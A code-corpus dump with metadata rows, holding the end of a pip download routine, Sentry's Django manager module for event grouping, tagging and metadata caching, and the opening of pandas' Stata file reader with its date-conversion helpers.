)
preparer = self.make_requirement_preparer(
temp_build_dir=directory,
options=options,
req_tracker=req_tracker,
session=session,
finder=finder,
download_dir=options.download_dir,
use_user_site=False,
)
resolver = self.make_resolver(
preparer=preparer,
finder=finder,
options=options,
py_version_info=options.python_version,
)
self.trace_basic_info(finder)
resolver.resolve(requirement_set)
downloaded = ' '.join([
req.name for req in requirement_set.successfully_downloaded
])
if downloaded:
write_output('Successfully downloaded %s', downloaded)
# Clean up
if not options.no_clean:
requirement_set.cleanup_files()
return requirement_set
| mit | -5,579,505,478,624,617,000 | 33.061224 | 79 | 0.611544 | false | 4.225316 | false | false | false |
rdio/sentry | src/sentry/manager.py | 1 | 34892 | """
sentry.manager
~~~~~~~~~~~~~~
:copyright: (c) 2010-2013 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import datetime
import hashlib
import logging
import time
import warnings
import uuid
from celery.signals import task_postrun
from django.conf import settings
from django.contrib.auth.models import UserManager
from django.core.signals import request_finished
from django.db import models, transaction, IntegrityError
from django.db.models import Sum
from django.utils import timezone
from django.utils.datastructures import SortedDict
from raven.utils.encoding import to_string
from sentry import app
from sentry.constants import (
STATUS_RESOLVED, STATUS_UNRESOLVED, MINUTE_NORMALIZATION,
LOG_LEVELS, DEFAULT_LOGGER_NAME, MAX_CULPRIT_LENGTH)
from sentry.db.models import BaseManager
from sentry.processors.base import send_group_processors
from sentry.signals import regression_signal
from sentry.tasks.index import index_event
from sentry.utils.cache import cache, memoize
from sentry.utils.dates import get_sql_date_trunc, normalize_datetime
from sentry.utils.db import get_db_engine, has_charts, attach_foreignkey
from sentry.utils.safe import safe_execute, trim, trim_dict, trim_frames
from sentry.utils.strings import strip
logger = logging.getLogger('sentry.errors')
UNSAVED = dict()
MAX_TAG_LENGTH = 200
def get_checksum_from_event(event):
interfaces = event.interfaces
for interface in interfaces.itervalues():
result = interface.get_composite_hash(interfaces=event.interfaces)
if result:
hash = hashlib.md5()
for r in result:
hash.update(to_string(r))
return hash.hexdigest()
return hashlib.md5(to_string(event.message)).hexdigest()
class ScoreClause(object):
def __init__(self, group):
self.group = group
def prepare_database_save(self, unused):
return self
def prepare(self, evaluator, query, allow_joins):
return
def evaluate(self, node, qn, connection):
engine = get_db_engine(getattr(connection, 'alias', 'default'))
if engine.startswith('postgresql'):
sql = 'log(times_seen) * 600 + last_seen::abstime::int'
elif engine.startswith('mysql'):
sql = 'log(times_seen) * 600 + unix_timestamp(last_seen)'
else:
# XXX: if we cant do it atomically let's do it the best we can
sql = self.group.get_score()
return (sql, [])
def count_limit(count):
# TODO: could we do something like num_to_store = max(math.sqrt(100*count)+59, 200) ?
# ~ 150 * ((log(n) - 1.5) ^ 2 - 0.25)
for amount, sample_rate in settings.SENTRY_SAMPLE_RATES:
if count <= amount:
return sample_rate
return settings.SENTRY_MAX_SAMPLE_RATE
def time_limit(silence): # ~ 3600 per hour
for amount, sample_rate in settings.SENTRY_SAMPLE_TIMES:
if silence >= amount:
return sample_rate
return settings.SENTRY_MAX_SAMPLE_TIME
class UserManager(BaseManager, UserManager):
pass
class ChartMixin(object):
def get_chart_data_for_group(self, instances, max_days=90, key=None):
if not instances:
if key is None:
return []
return {}
if hasattr(instances[0], '_state'):
db = instances[0]._state.db or 'default'
else:
db = 'default'
field = self.model.groupcountbyminute_set.related
column = field.field.name
queryset = field.model.objects.filter(**{
'%s__in' % column: instances,
})
return self._get_chart_data(queryset, max_days, db, key=key)
def get_chart_data(self, instance, max_days=90, key=None):
if hasattr(instance, '_state'):
db = instance._state.db or 'default'
else:
db = 'default'
queryset = instance.groupcountbyminute_set
return self._get_chart_data(queryset, max_days, db, key=key)
def _get_chart_data(self, queryset, max_days=90, db='default', key=None):
if not has_charts(db):
if key is None:
return []
return {}
today = timezone.now().replace(microsecond=0, second=0)
# the last interval is not accurate, so we exclude it
# TODO: it'd be ideal to normalize the last datapoint so that we can include it
# and not have ~inaccurate data for up to MINUTE_NORMALIZATION
today -= datetime.timedelta(minutes=MINUTE_NORMALIZATION)
if max_days >= 30:
g_type = 'date'
d_type = 'days'
points = max_days
modifier = 1
today = today.replace(hour=0)
elif max_days >= 1:
g_type = 'hour'
d_type = 'hours'
points = max_days * 24
modifier = 1
today = today.replace(minute=0)
else:
g_type = 'minute'
d_type = 'minutes'
modifier = MINUTE_NORMALIZATION
points = max_days * 24 * (60 / modifier)
min_date = today - datetime.timedelta(days=max_days)
method = get_sql_date_trunc('date', db, grouper=g_type)
chart_qs = queryset.filter(
date__gte=min_date,
).extra(
select={'grouper': method},
)
if key:
chart_qs = chart_qs.values('grouper', key)
else:
chart_qs = chart_qs.values('grouper')
chart_qs = chart_qs.annotate(
num=Sum('times_seen'),
)
if key:
chart_qs = chart_qs.values_list(key, 'grouper', 'num').order_by(key, 'grouper')
else:
chart_qs = chart_qs.values_list('grouper', 'num').order_by('grouper')
if key is None:
rows = {None: dict(chart_qs)}
else:
rows = {}
for item, grouper, num in chart_qs:
if item not in rows:
rows[item] = {}
rows[item][grouper] = num
results = {}
for item, tsdata in rows.iteritems():
results[item] = []
for point in xrange(points, -1, -1):
dt = today - datetime.timedelta(**{d_type: point * modifier})
results[item].append((int(time.mktime((dt).timetuple())) * 1000, tsdata.get(dt, 0)))
if key is None:
return results[None]
return results
class GroupManager(BaseManager, ChartMixin):
use_for_related_fields = True
def normalize_event_data(self, data):
# TODO(dcramer): store http.env.REMOTE_ADDR as user.ip
# First we pull out our top-level (non-data attr) kwargs
if not data.get('level') or data['level'] not in LOG_LEVELS:
data['level'] = logging.ERROR
if not data.get('logger'):
data['logger'] = DEFAULT_LOGGER_NAME
else:
data['logger'] = trim(data['logger'], 64)
timestamp = data.get('timestamp')
if not timestamp:
timestamp = timezone.now()
# We must convert date to local time so Django doesn't mess it up
# based on TIME_ZONE
if settings.TIME_ZONE:
if not timezone.is_aware(timestamp):
timestamp = timestamp.replace(tzinfo=timezone.utc)
elif timezone.is_aware(timestamp):
timestamp = timestamp.replace(tzinfo=None)
data['timestamp'] = timestamp
if not data.get('event_id'):
data['event_id'] = uuid.uuid4().hex
data.setdefault('message', None)
data.setdefault('culprit', None)
data.setdefault('time_spent', None)
data.setdefault('server_name', None)
data.setdefault('site', None)
data.setdefault('checksum', None)
data.setdefault('platform', None)
data.setdefault('extra', {})
tags = data.get('tags')
if not tags:
tags = []
# full support for dict syntax
elif isinstance(tags, dict):
tags = tags.items()
# prevent [tag, tag, tag] (invalid) syntax
elif not all(len(t) == 2 for t in tags):
tags = []
else:
tags = list(tags)
data['tags'] = tags
data['message'] = strip(data['message'])
data['culprit'] = strip(data['culprit'])
if not isinstance(data['extra'], dict):
# throw it away
data['extra'] = {}
trim_dict(
data['extra'], max_size=settings.SENTRY_MAX_EXTRA_VARIABLE_SIZE)
if 'sentry.interfaces.Exception' in data:
if 'values' not in data['sentry.interfaces.Exception']:
data['sentry.interfaces.Exception'] = {
'values': [data['sentry.interfaces.Exception']]
}
# convert stacktrace + exception into expanded exception
if 'sentry.interfaces.Stacktrace' in data:
data['sentry.interfaces.Exception']['values'][0]['stacktrace'] = data.pop('sentry.interfaces.Stacktrace')
for exc_data in data['sentry.interfaces.Exception']['values']:
for key in ('type', 'module', 'value'):
value = exc_data.get(key)
if value:
exc_data[key] = trim(value)
if exc_data.get('stacktrace'):
trim_frames(exc_data['stacktrace'])
for frame in exc_data['stacktrace']['frames']:
stack_vars = frame.get('vars', {})
trim_dict(stack_vars)
if 'sentry.interfaces.Stacktrace' in data:
trim_frames(data['sentry.interfaces.Stacktrace'])
for frame in data['sentry.interfaces.Stacktrace']['frames']:
stack_vars = frame.get('vars', {})
trim_dict(stack_vars)
if 'sentry.interfaces.Message' in data:
msg_data = data['sentry.interfaces.Message']
trim(msg_data['message'], 1024)
if msg_data.get('params'):
msg_data['params'] = trim(msg_data['params'])
if 'sentry.interfaces.Http' in data:
http_data = data['sentry.interfaces.Http']
for key in ('cookies', 'querystring', 'headers', 'env', 'url'):
value = http_data.get(key)
if not value:
continue
if type(value) == dict:
trim_dict(value)
else:
http_data[key] = trim(value)
value = http_data.get('data')
if value:
http_data['data'] = trim(value, 2048)
# default the culprit to the url
if not data['culprit']:
data['culprit'] = trim(strip(http_data.get('url')), MAX_CULPRIT_LENGTH)
return data
def from_kwargs(self, project, **kwargs):
data = self.normalize_event_data(kwargs)
return self.save_data(project, data)
def save_data(self, project, data, raw=False):
# TODO: this function is way too damn long and needs refactored
# the inner imports also suck so let's try to move it away from
# the objects manager
# TODO: culprit should default to "most recent" frame in stacktraces when
# it's not provided.
from sentry.plugins import plugins
from sentry.models import Event, Project, EventMapping
with transaction.commit_on_success():
project = Project.objects.get_from_cache(id=project)
# First we pull out our top-level (non-data attr) kwargs
event_id = data.pop('event_id')
message = data.pop('message')
culprit = data.pop('culprit')
level = data.pop('level')
time_spent = data.pop('time_spent')
logger_name = data.pop('logger')
server_name = data.pop('server_name')
site = data.pop('site')
date = data.pop('timestamp')
checksum = data.pop('checksum')
platform = data.pop('platform')
if 'sentry.interfaces.Exception' in data:
if 'values' not in data['sentry.interfaces.Exception']:
data['sentry.interfaces.Exception'] = {'values': [data['sentry.interfaces.Exception']]}
# convert stacktrace + exception into expanded exception
if 'sentry.interfaces.Stacktrace' in data:
data['sentry.interfaces.Exception']['values'][0]['stacktrace'] = data.pop('sentry.interfaces.Stacktrace')
kwargs = {
'level': level,
'message': message,
'platform': platform,
'culprit': culprit or '',
'logger': logger_name,
}
event = Event(
project=project,
event_id=event_id,
data=data,
server_name=server_name,
site=site,
time_spent=time_spent,
datetime=date,
**kwargs
)
# Calculate the checksum from the first highest scoring interface
if not checksum:
checksum = get_checksum_from_event(event)
event.checksum = checksum
group_kwargs = kwargs.copy()
group_kwargs.update({
'last_seen': date,
'first_seen': date,
'time_spent_total': time_spent or 0,
'time_spent_count': time_spent and 1 or 0,
})
tags = data['tags']
tags.append(('level', LOG_LEVELS[level]))
if logger:
tags.append(('logger', logger_name))
if server_name:
tags.append(('server_name', server_name))
if site:
tags.append(('site', site))
for plugin in plugins.for_project(project):
added_tags = safe_execute(plugin.get_tags, event)
if added_tags:
tags.extend(added_tags)
try:
group, is_new, is_sample = self._create_group(
event=event,
tags=data['tags'],
**group_kwargs
)
except Exception as exc:
# TODO: should we mail admins when there are failures?
try:
logger.exception(u'Unable to process log entry: %s', exc)
except Exception, exc:
warnings.warn(u'Unable to process log entry: %s', exc)
return
using = group._state.db
event.group = group
# save the event unless its been sampled
if not is_sample:
sid = transaction.savepoint(using=using)
try:
event.save()
except IntegrityError:
transaction.savepoint_rollback(sid, using=using)
return event
transaction.savepoint_commit(sid, using=using)
sid = transaction.savepoint(using=using)
try:
EventMapping.objects.create(
project=project, group=group, event_id=event_id)
except IntegrityError:
transaction.savepoint_rollback(sid, using=using)
return event
transaction.savepoint_commit(sid, using=using)
transaction.commit_unless_managed(using=using)
if not raw:
send_group_processors(
group=group,
event=event,
is_new=is_new,
is_sample=is_sample
)
# TODO: move this to the queue
if is_new and not raw:
regression_signal.send_robust(sender=self.model, instance=group)
if getattr(settings, 'SENTRY_INDEX_SEARCH', settings.SENTRY_USE_SEARCH):
index_event.delay(event)
return event
def should_sample(self, group, event):
if not settings.SENTRY_SAMPLE_DATA:
return False
silence_timedelta = event.datetime - group.last_seen
silence = silence_timedelta.days * 86400 + silence_timedelta.seconds
if group.times_seen % count_limit(group.times_seen):
return False
if group.times_seen % time_limit(silence):
return False
return True
def _create_group(self, event, tags=None, **kwargs):
from sentry.models import ProjectCountByMinute, GroupCountByMinute
date = event.datetime
time_spent = event.time_spent
project = event.project
group, is_new = self.get_or_create(
project=project,
checksum=event.checksum,
defaults=kwargs
)
if is_new:
transaction.commit_unless_managed(using=group._state.db)
update_kwargs = {
'times_seen': 1,
}
if time_spent:
update_kwargs.update({
'time_spent_total': time_spent,
'time_spent_count': 1,
})
if not is_new:
extra = {
'last_seen': max(event.datetime, group.last_seen),
'score': ScoreClause(group),
}
if event.message and event.message != group.message:
extra['message'] = event.message
if group.level != event.level:
extra['level'] = event.level
if group.status == STATUS_RESOLVED or group.is_over_resolve_age():
# Making things atomic
is_new = bool(self.filter(
id=group.id,
status=STATUS_RESOLVED,
).exclude(
active_at__gte=date,
).update(active_at=date, status=STATUS_UNRESOLVED))
transaction.commit_unless_managed(using=group._state.db)
group.active_at = date
group.status = STATUS_UNRESOLVED
group.last_seen = extra['last_seen']
app.buffer.incr(self.model, update_kwargs, {
'id': group.id,
}, extra)
else:
# TODO: this update should actually happen as part of create
group.update(score=ScoreClause(group))
# We need to commit because the queue can run too fast and hit
# an issue with the group not existing before the buffers run
transaction.commit_unless_managed(using=group._state.db)
# Determine if we've sampled enough data to store this event
if is_new:
is_sample = False
elif not self.should_sample(group, event):
is_sample = False
else:
is_sample = True
# Rounded down to the nearest interval
normalized_datetime = normalize_datetime(date)
app.buffer.incr(GroupCountByMinute, update_kwargs, {
'group': group,
'project': project,
'date': normalized_datetime,
})
app.buffer.incr(ProjectCountByMinute, update_kwargs, {
'project': project,
'date': normalized_datetime,
})
try:
self.add_tags(group, tags)
except Exception, e:
logger.exception('Unable to record tags: %s' % (e,))
return group, is_new, is_sample
def add_tags(self, group, tags):
from sentry.models import TagValue, GroupTag
project = group.project
date = group.last_seen
for tag_item in tags:
if len(tag_item) == 2:
(key, value), data = tag_item, None
else:
key, value, data = tag_item
if not value:
continue
value = unicode(value)
if len(value) > MAX_TAG_LENGTH:
continue
app.buffer.incr(TagValue, {
'times_seen': 1,
}, {
'project': project,
'key': key,
'value': value,
}, {
'last_seen': date,
'data': data,
})
app.buffer.incr(GroupTag, {
'times_seen': 1,
}, {
'group': group,
'project': project,
'key': key,
'value': value,
}, {
'last_seen': date,
})
def get_by_natural_key(self, project, logger, culprit, checksum):
return self.get(project=project, logger=logger, view=culprit, checksum=checksum)
@memoize
def model_fields_clause(self):
return ', '.join('sentry_groupedmessage."%s"' % (f.column,) for f in self.model._meta.fields)
def get_accelerated(self, project_ids, queryset=None, minutes=15):
if not project_ids:
return self.none()
if queryset is None:
queryset = self.filter(
project__in=project_ids,
status=STATUS_UNRESOLVED,
)
else:
queryset = queryset._clone()
queryset.query.select_related = False
normalization = float(MINUTE_NORMALIZATION)
assert minutes >= normalization
intervals = 8
engine = get_db_engine(queryset.db)
# We technically only support mysql and postgresql, since there seems to be no standard
# way to get the epoch from a datetime/interval
if engine.startswith('mysql'):
minute_clause = "interval %s minute"
epoch_clause = "unix_timestamp(utc_timestamp()) - unix_timestamp(mcbm.date)"
now_clause = 'utc_timestamp()'
else:
minute_clause = "interval '%s minutes'"
epoch_clause = "extract(epoch from now()) - extract(epoch from mcbm.date)"
now_clause = 'now()'
sql, params = queryset.query.get_compiler(queryset.db).as_sql()
before_select, after_select = str(sql).split('SELECT ', 1)
after_where = after_select.split(' WHERE ', 1)[1]
# Ensure we remove any ordering clause
after_where = after_where.split(' ORDER BY ')[0]
query = """
SELECT ((mcbm.times_seen + 1) / ((%(epoch_clause)s) / 60)) / (COALESCE(z.rate, 0) + 1) as sort_value,
%(fields)s
FROM sentry_groupedmessage
INNER JOIN sentry_messagecountbyminute as mcbm
ON (sentry_groupedmessage.id = mcbm.group_id)
LEFT JOIN (SELECT a.group_id, (SUM(a.times_seen)) / COUNT(a.times_seen) / %(norm)f as rate
FROM sentry_messagecountbyminute as a
WHERE a.date >= %(now)s - %(max_time)s
AND a.date < %(now)s - %(min_time)s
AND a.project_id IN (%(project_ids)s)
GROUP BY a.group_id) as z
ON z.group_id = mcbm.group_id
WHERE mcbm.date >= %(now)s - %(min_time)s
AND mcbm.date < %(now)s - %(offset_time)s
AND mcbm.times_seen > 0
AND ((mcbm.times_seen + 1) / ((%(epoch_clause)s) / 60)) > (COALESCE(z.rate, 0) + 1)
AND %(after_where)s
GROUP BY z.rate, mcbm.times_seen, mcbm.date, %(fields)s
ORDER BY sort_value DESC
""" % dict(
fields=self.model_fields_clause,
after_where=after_where,
offset_time=minute_clause % (1,),
min_time=minute_clause % (minutes + 1,),
max_time=minute_clause % (minutes * intervals + 1,),
norm=normalization,
epoch_clause=epoch_clause,
now=now_clause,
project_ids=', '.join((str(int(x)) for x in project_ids)),
)
return RawQuerySet(self, query, params)
class RawQuerySet(object):
def __init__(self, queryset, query, params):
self.queryset = queryset
self.query = query
self.params = params
def __getitem__(self, k):
offset = k.start or 0
limit = k.stop - offset
limit_clause = ' LIMIT %d OFFSET %d' % (limit, offset)
query = self.query + limit_clause
return self.queryset.raw(query, self.params)
class ProjectManager(BaseManager, ChartMixin):
def get_for_user(self, user=None, access=None, hidden=False, team=None,
superuser=True):
"""
Returns a SortedDict of all projects a user has some level of access to.
"""
from sentry.models import Team
if not (user and user.is_authenticated()):
return []
# TODO: the result of this function should be cached
is_authenticated = (user and user.is_authenticated())
base_qs = self
if not hidden:
base_qs = base_qs.filter(status=0)
if team:
base_qs = base_qs.filter(team=team)
if team and user.is_superuser and superuser:
projects = set(base_qs)
else:
projects_qs = base_qs
if not settings.SENTRY_PUBLIC:
# If the user is authenticated, include their memberships
teams = Team.objects.get_for_user(
user, access, access_groups=False).values()
if not teams:
projects_qs = self.none()
if team and team not in teams:
projects_qs = self.none()
elif not team:
projects_qs = projects_qs.filter(team__in=teams)
projects = set(projects_qs)
if is_authenticated:
projects |= set(base_qs.filter(accessgroup__members=user))
attach_foreignkey(projects, self.model.team)
return sorted(projects, key=lambda x: x.name.lower())
class MetaManager(BaseManager):
NOTSET = object()
def __init__(self, *args, **kwargs):
super(MetaManager, self).__init__(*args, **kwargs)
task_postrun.connect(self.clear_cache)
request_finished.connect(self.clear_cache)
self.__metadata = {}
def __getstate__(self):
d = self.__dict__.copy()
# we cant serialize weakrefs
d.pop('_MetaManager__metadata', None)
return d
def __setstate__(self, state):
self.__dict__.update(state)
self.__metadata = {}
def get_value(self, key, default=NOTSET):
result = self.get_all_values()
if default is self.NOTSET:
return result[key]
return result.get(key, default)
def unset_value(self, key):
self.filter(key=key).delete()
self.__metadata.pop(key, None)
def set_value(self, key, value):
print key, value
inst, _ = self.get_or_create(
key=key,
defaults={
'value': value,
}
)
if inst.value != value:
inst.update(value=value)
self.__metadata[key] = value
def get_all_values(self):
if not hasattr(self, '_MetaManager__metadata'):
self.__metadata = dict(self.values_list('key', 'value'))
return self.__metadata
def clear_cache(self, **kwargs):
self.__metadata = {}
class InstanceMetaManager(BaseManager):
NOTSET = object()
def __init__(self, field_name, *args, **kwargs):
super(InstanceMetaManager, self).__init__(*args, **kwargs)
self.field_name = field_name
task_postrun.connect(self.clear_cache)
request_finished.connect(self.clear_cache)
self.__metadata = {}
def __getstate__(self):
d = self.__dict__.copy()
# we cant serialize weakrefs
d.pop('_InstanceMetaManager__metadata', None)
return d
def __setstate__(self, state):
self.__dict__.update(state)
self.__metadata = {}
def _make_key(self, instance):
if isinstance(instance, models.Model):
instance_id = instance.pk
else:
instance_id = instance
return '%s:%s' % (self.model._meta.db_table, instance_id)
def get_value_bulk(self, instances, key):
return dict(self.filter(**{
'%s__in' % self.field_name: instances,
'key': key,
}).values_list(self.field_name, 'value'))
def get_value(self, instance, key, default=NOTSET):
result = self.get_all_values(instance)
if default is self.NOTSET:
return result[key]
return result.get(key, default)
def unset_value(self, instance, key):
self.filter(**{self.field_name: instance, 'key': key}).delete()
if instance.pk not in self.__metadata:
cache.delete(self._make_key(instance))
return
self.__metadata[instance.pk].pop(key, None)
cache.set(self._make_key(instance), self.__metadata[instance.pk])
def set_value(self, instance, key, value):
inst, created = self.get_or_create(**{
self.field_name: instance,
'key': key,
'defaults': {
'value': value,
}
})
if not created and inst.value != value:
inst.update(value=value)
if instance.pk not in self.__metadata:
cache.delete(self._make_key(instance))
return
self.__metadata[instance.pk][key] = value
cache.set(self._make_key(instance), self.__metadata[instance.pk])
def get_all_values(self, instance):
if isinstance(instance, models.Model):
instance_id = instance.pk
else:
instance_id = instance
if instance_id not in self.__metadata:
cache_key = self._make_key(instance)
result = cache.get(cache_key)
if result is None:
result = dict(
(i.key, i.value) for i in
self.filter(**{
self.field_name: instance_id,
})
)
cache.set(cache_key, result)
self.__metadata[instance_id] = result
return self.__metadata.get(instance_id, {})
def clear_cache(self, **kwargs):
self.__metadata = {}
class UserOptionManager(BaseManager):
NOTSET = object()
def __init__(self, *args, **kwargs):
super(UserOptionManager, self).__init__(*args, **kwargs)
task_postrun.connect(self.clear_cache)
request_finished.connect(self.clear_cache)
self.__metadata = {}
def __getstate__(self):
d = self.__dict__.copy()
# we cant serialize weakrefs
d.pop('_UserOptionManager__metadata', None)
return d
def __setstate__(self, state):
self.__dict__.update(state)
self.__metadata = {}
def get_value(self, user, project, key, default=NOTSET):
result = self.get_all_values(user, project)
if default is self.NOTSET:
return result[key]
return result.get(key, default)
def unset_value(self, user, project, key):
self.filter(user=user, project=project, key=key).delete()
if not hasattr(self, '_metadata'):
return
if project:
metakey = (user.pk, project.pk)
else:
metakey = (user.pk, None)
if metakey not in self.__metadata:
return
self.__metadata[metakey].pop(key, None)
def set_value(self, user, project, key, value):
inst, created = self.get_or_create(
user=user,
project=project,
key=key,
defaults={
'value': value,
},
)
if not created and inst.value != value:
inst.update(value=value)
if project:
metakey = (user.pk, project.pk)
else:
metakey = (user.pk, None)
if metakey not in self.__metadata:
return
self.__metadata[metakey][key] = value
def get_all_values(self, user, project):
if project:
metakey = (user.pk, project.pk)
else:
metakey = (user.pk, None)
if metakey not in self.__metadata:
result = dict(
(i.key, i.value) for i in
self.filter(
user=user,
project=project,
)
)
self.__metadata[metakey] = result
return self.__metadata.get(metakey, {})
def clear_cache(self, **kwargs):
self.__metadata = {}
class TagKeyManager(BaseManager):
def _get_cache_key(self, project_id):
return 'filterkey:all:%s' % project_id
def all_keys(self, project):
# TODO: cache invalidation via post_save/post_delete signals much like BaseManager
key = self._get_cache_key(project.id)
result = cache.get(key)
if result is None:
result = list(self.filter(project=project).values_list('key', flat=True))
cache.set(key, result, 60)
return result
class TeamManager(BaseManager):
def get_for_user(self, user, access=None, access_groups=True, with_projects=False):
"""
Returns a SortedDict of all teams a user has some level of access to.
Each <Team> returned has a ``membership`` attribute which holds the
<TeamMember> instance.
"""
from sentry.models import TeamMember, AccessGroup, Project
results = SortedDict()
if not user.is_authenticated():
return results
if settings.SENTRY_PUBLIC and access is None:
for team in sorted(self.iterator(), key=lambda x: x.name.lower()):
results[team.slug] = team
else:
all_teams = set()
qs = TeamMember.objects.filter(
user=user,
).select_related('team')
if access is not None:
qs = qs.filter(type__lte=access)
for tm in qs:
all_teams.add(tm.team)
if access_groups:
qs = AccessGroup.objects.filter(
members=user,
).select_related('team')
if access is not None:
qs = qs.filter(type__lte=access)
for group in qs:
all_teams.add(group.team)
for team in sorted(all_teams, key=lambda x: x.name.lower()):
results[team.slug] = team
if with_projects:
# these kinds of queries make people sad :(
new_results = SortedDict()
for team in results.itervalues():
project_list = list(Project.objects.get_for_user(
user, team=team))
new_results[team.slug] = (team, project_list)
results = new_results
return results
| bsd-3-clause | 8,448,772,539,851,207,000 | 32.712077 | 125 | 0.547088 | false | 4.165712 | false | false | false |
kenshay/ImageScripter | ProgramData/SystemFiles/Python/Lib/site-packages/pandas/io/stata.py | 7 | 82769 | """
Module contains tools for processing Stata files into DataFrames
The StataReader below was originally written by Joe Presbrey as part of PyDTA.
It has been extended and improved by Skipper Seabold from the Statsmodels
project who also developed the StataWriter and was finally added to pandas in
a once again improved version.
You can find more information on http://presbrey.mit.edu/PyDTA and
http://www.statsmodels.org/devel/
"""
import numpy as np
import sys
import struct
from dateutil.relativedelta import relativedelta
from pandas.types.common import (is_categorical_dtype, is_datetime64_dtype,
_ensure_object)
from pandas.core.base import StringMixin
from pandas.core.categorical import Categorical
from pandas.core.frame import DataFrame
from pandas.core.series import Series
import datetime
from pandas import compat, to_timedelta, to_datetime, isnull, DatetimeIndex
from pandas.compat import lrange, lmap, lzip, text_type, string_types, range, \
zip, BytesIO
from pandas.util.decorators import Appender
import pandas as pd
from pandas.io.common import get_filepath_or_buffer, BaseIterator
from pandas.lib import max_len_string_array, infer_dtype
from pandas.tslib import NaT, Timestamp
_version_error = ("Version of given Stata file is not 104, 105, 108, "
"111 (Stata 7SE), 113 (Stata 8/9), 114 (Stata 10/11), "
"115 (Stata 12), 117 (Stata 13), or 118 (Stata 14)")
_statafile_processing_params1 = """\
convert_dates : boolean, defaults to True
Convert date variables to DataFrame time values
convert_categoricals : boolean, defaults to True
Read value labels and convert columns to Categorical/Factor variables"""
_encoding_params = """\
encoding : string, None or encoding
Encoding used to parse the files. None defaults to iso-8859-1."""
_statafile_processing_params2 = """\
index : identifier of index column
identifier of column that should be used as index of the DataFrame
convert_missing : boolean, defaults to False
Flag indicating whether to convert missing values to their Stata
representations. If False, missing values are replaced with nans.
If True, columns containing missing values are returned with
object data types and missing values are represented by
StataMissingValue objects.
preserve_dtypes : boolean, defaults to True
Preserve Stata datatypes. If False, numeric data are upcast to pandas
default types for foreign data (float64 or int64)
columns : list or None
Columns to retain. Columns will be returned in the given order. None
returns all columns
order_categoricals : boolean, defaults to True
Flag indicating whether converted categorical data are ordered."""
_chunksize_params = """\
chunksize : int, default None
Return StataReader object for iterations, returns chunks with
given number of lines"""
_iterator_params = """\
iterator : boolean, default False
Return StataReader object"""
_read_stata_doc = """Read Stata file into DataFrame
Parameters
----------
filepath_or_buffer : string or file-like object
Path to .dta file or object implementing a binary read() functions
%s
%s
%s
%s
%s
Returns
-------
DataFrame or StataReader
Examples
--------
Read a Stata dta file:
>>> df = pandas.read_stata('filename.dta')
Read a Stata dta file in 10,000 line chunks:
>>> itr = pandas.read_stata('filename.dta', chunksize=10000)
>>> for chunk in itr:
>>> do_something(chunk)
""" % (_statafile_processing_params1, _encoding_params,
_statafile_processing_params2, _chunksize_params,
_iterator_params)
_data_method_doc = """Reads observations from Stata file, converting them into a dataframe
This is a legacy method. Use `read` in new code.
Parameters
----------
%s
%s
Returns
-------
DataFrame
""" % (_statafile_processing_params1, _statafile_processing_params2)
_read_method_doc = """\
Reads observations from Stata file, converting them into a dataframe
Parameters
----------
nrows : int
Number of lines to read from data file, if None read whole file.
%s
%s
Returns
-------
DataFrame
""" % (_statafile_processing_params1, _statafile_processing_params2)
_stata_reader_doc = """\
Class for reading Stata dta files.
Parameters
----------
path_or_buf : string or file-like object
Path to .dta file or object implementing a binary read() functions
%s
%s
%s
%s
""" % (_statafile_processing_params1, _statafile_processing_params2,
_encoding_params, _chunksize_params)
@Appender(_read_stata_doc)
def read_stata(filepath_or_buffer, convert_dates=True,
convert_categoricals=True, encoding=None, index=None,
convert_missing=False, preserve_dtypes=True, columns=None,
order_categoricals=True, chunksize=None, iterator=False):
reader = StataReader(filepath_or_buffer,
convert_dates=convert_dates,
convert_categoricals=convert_categoricals,
index=index, convert_missing=convert_missing,
preserve_dtypes=preserve_dtypes,
columns=columns,
order_categoricals=order_categoricals,
chunksize=chunksize, encoding=encoding)
if iterator or chunksize:
data = reader
else:
data = reader.read()
reader.close()
return data
_date_formats = ["%tc", "%tC", "%td", "%d", "%tw", "%tm", "%tq", "%th", "%ty"]
stata_epoch = datetime.datetime(1960, 1, 1)
def _stata_elapsed_date_to_datetime_vec(dates, fmt):
"""
Convert from SIF to datetime. http://www.stata.com/help.cgi?datetime
Parameters
----------
dates : Series
The Stata Internal Format date to convert to datetime according to fmt
fmt : str
The format to convert to. Can be, tc, td, tw, tm, tq, th, ty
Returns
Returns
-------
converted : Series
The converted dates
Examples
--------
>>> import pandas as pd
>>> dates = pd.Series([52])
>>> _stata_elapsed_date_to_datetime_vec(dates , "%tw")
0 1961-01-01
dtype: datetime64[ns]
Notes
-----
datetime/c - tc
milliseconds since 01jan1960 00:00:00.000, assuming 86,400 s/day
datetime/C - tC - NOT IMPLEMENTED
milliseconds since 01jan1960 00:00:00.000, adjusted for leap seconds
date - td
days since 01jan1960 (01jan1960 = 0)
weekly date - tw
weeks since 1960w1
This assumes 52 weeks in a year, then adds 7 * remainder of the weeks.
The datetime value is the start of the week in terms of days in the
year, not ISO calendar weeks.
monthly date - tm
months since 1960m1
quarterly date - tq
quarters since 1960q1
half-yearly date - th
half-years since 1960h1 yearly
date - ty
years since 0000
If you don't have pandas with datetime support, then you can't do
milliseconds accurately.
"""
MIN_YEAR, MAX_YEAR = Timestamp.min.year, Timestamp.max.year
MAX_DAY_DELTA = (Timestamp.max - datetime.datetime(1960, 1, 1)).days
MIN_DAY_DELTA = (Timestamp.min - datetime.datetime(1960, 1, 1)).days
MIN_MS_DELTA = MIN_DAY_DELTA * 24 * 3600 * 1000
MAX_MS_DELTA = MAX_DAY_DELTA * 24 * 3600 * 1000
def convert_year_month_safe(year, month):
"""
Convert year and month to datetimes, using pandas vectorized versions
when the date range falls within the range supported by pandas. Other
wise it falls back to a slower but more robust method using datetime.
"""
if year.max() < MAX_YEAR and year.min() > MIN_YEAR:
return to_datetime(100 * year + month, format='%Y%m')
else:
index = getattr(year, 'index', None)
return Series(
[datetime.datetime(y, m, 1) for y, m in zip(year, month)],
index=index)
def convert_year_days_safe(year, days):
"""
Converts year (e.g. 1999) and days since the start of the year to a
datetime or datetime64 Series
"""
if year.max() < (MAX_YEAR - 1) and year.min() > MIN_YEAR:
return (to_datetime(year, format='%Y') +
to_timedelta(days, unit='d'))
else:
index = getattr(year, 'index', None)
value = [datetime.datetime(y, 1, 1) + relativedelta(days=int(d))
for y, d in zip(year, days)]
return Series(value, index=index)
def convert_delta_safe(base, deltas, unit):
"""
Convert base dates and deltas to datetimes, using pandas vectorized
versions if the deltas satisfy restrictions required to be expressed
as dates in pandas.
"""
index = getattr(deltas, 'index', None)
if unit == 'd':
